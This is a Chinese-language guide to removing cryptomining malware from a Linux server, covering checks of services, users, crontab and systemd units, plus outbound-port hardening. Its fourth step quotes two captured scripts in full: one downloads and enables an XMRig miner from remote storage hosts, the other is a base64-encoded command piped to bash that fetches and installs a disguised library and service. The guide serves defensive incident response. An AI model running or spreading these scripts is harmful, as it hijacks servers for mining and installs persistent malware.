1.檢查自啟動項
執行systemctl list-unit-files --type=service | grep enabled命令列出全部自啟動項,有異常啟動項執行systemctl disable A_li_yun_Duns.service刪除。A_li_yun_Duns.service為自啟動項名稱。
2.檢查系統使用者
執行vi /etc/passwd檢查系統使用者,如有異常使用者將其禁用,執行passwd -l 使用者名稱
3.檢查定時任務
執行crontab -e檢視定時任務有無預設任務新增進來。若有將其註釋掉或刪掉。將其執行的指令碼檔案一起刪除。
4.檢查根目錄有無異常檔案
本次根目錄下異常檔案為wawa.sh、update_udp.sh,以下為wawa.sh指令碼內容
#!/bin/bash
cd /root;wget http://zhongcheng-app.oss-cn-beijing.aliyuncs.com/image/image/xmrig-6.21.1-linux-static-x64.tar.gz;tar -zxvf xmrig-6.21.1-linux-static-x64.tar.gz;systemctl stop monero.service;rm -rf /etc/systemd/system/monero.service;wget http://zcapp.oss-cn-beijing.aliyuncs.com/icon/monero.service;sysctl -w vm.nr_hugepages=$((1168+$(nproc)));mv monero.service /etc/systemd/system/monero.service;systemctl daemon-reload;systemctl enable monero.service;systemctl start monero.service以下為update_udp.sh指令碼內容,命令做了base64加密,需要base64解密
#!/bin/bash
echo "IyEvYmluL2Jhc2gKY3VybCAtcyBodHRwOi8vYnBnLXRlc3Qub3NzLWNuLWNoZW5nZHUuYWxpeXVuY3MuY29tL3NDaGFuZ2UvMjAyNC8wMi8yNy9saWJodi5zbyAtbyAvb3B0L2xpYmh2LnNvO2NwIC9vcHQvbGliaHYuc28gL3Vzci9saWIvbGliaHYuc287Y3AgL29wdC9saWJodi5zbyAvdXNyL2xpYjY0L2xpYmh2LnNvO2N1cmwgLXMgaHR0cDovL2JwZy10ZXN0Lm9zcy1jbi1jaGVuZ2R1LmFsaXl1bmNzLmNvbS9zQ2hhbmdlLzIwMjQvMDIvMjcvc3lzZXRtZCAtbyAvb3B0L3N5c2V0bWQ7Y2htb2QgNzc3IC9vcHQvc3lzZXRtZDtjdXJsIC1zIGh0dHA6Ly9icGctdGVzdC5vc3MtY24tY2hlbmdkdS5hbGl5dW5jcy5jb20vc0NoYW5nZS8yMDI0LzAyLzI3L3N5c2V0bWQuc2VydmljZSAtbyAvZXRjL3N5c3RlbWQvc3lzdGVtL3N5c2V0bWQuc2VydmljZTtzeXN0ZW1jdGwgZGFlbW9uLXJlbG9hZDtzeXN0ZW1jdGwgZW5hYmxlIHN5c2V0bWQuc2VydmljZTtzeXN0ZW1jdGwgc3RhcnQgc3lzZXRtZC5zZXJ2aWNlOw=="|base64 -di|bash -s解讀指令碼內容,將涉及到的檔案清除
5.檢查/root目錄下有無陌生目錄
發現xmrig目錄清除
6.檢查systemctl服務
執行cd /etc/systemd/system,檢查該目錄下有無異常服務檔案,本次異常檔案為A_li_yun_Duns.service,偽裝成了阿里雲安全服務。
處理策略
1.儘量較少對公網開放的埠,尤其是mq的。
2.關閉全部安全組出方向埠,用到哪個開啟哪個。挖礦程式需要請求網路領取任務,這樣挖礦程式就沒任務可執行。